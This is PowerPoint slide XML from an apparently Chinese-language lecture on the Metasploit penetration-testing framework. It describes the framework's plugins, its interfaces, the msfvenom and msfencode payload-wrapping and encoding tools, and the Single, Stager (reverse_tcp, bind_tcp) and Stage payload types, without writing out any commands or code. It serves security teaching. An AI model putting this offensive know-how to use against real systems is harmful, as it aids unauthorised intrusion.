              </a:rPr>
              <a:t>）插件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>插件能够扩充框架的功能，或者组装已有功能构成高级特性的组件。插件可以集成现有的一些外部安全工具，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>OpenVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>漏洞扫描器等，为用户接口提供一些新的功能。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>）接口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>控制终端、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>msfcli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>命令行、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>msfgui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>图形化界面、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>图形化界面以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>msfapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>远程调用接口。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>）功能程序</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>还提供了一系列可直接运行的功能程序，支持渗透测试者与安全人员快速地利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>框架内部能力完成一些特定任务。比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>可以将攻击载荷封装为可执行文件、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>语言、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191B1F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>语言等多种形式，并可以进行各种类型的编码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体"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80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1534353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fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="949407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三种模式：</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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Single: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Single</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>是一种完全独立的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>，而且使用起来就像运行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>calc.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>一样简单，例如添加一个系统用户或删除一份文件。由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Single Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>是完全独立的，因此它们有可能会被类似 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>这样的非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>处理工具所捕捉到。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Stager:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Stager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>这种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>负责建立目标用户与攻击者之间的网络连接，并下载额外的组件或应用程序。一种常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Stager Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>，它可以让目标系统与攻击者建立一条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>连接，让目标系统主动连接我们的端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>反向连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>。另一种常见的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>，它可以让目标系统开启一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>监听器，而攻击者随时可以与目标系统进行通信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>正向连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Stage:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Stager Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>下的一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>组件，这种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>可以提供更加高级的功能，而且没有大小限制。</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80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31994432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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>相当于运载火箭</a:t>
            </a:r>
            <a:r>
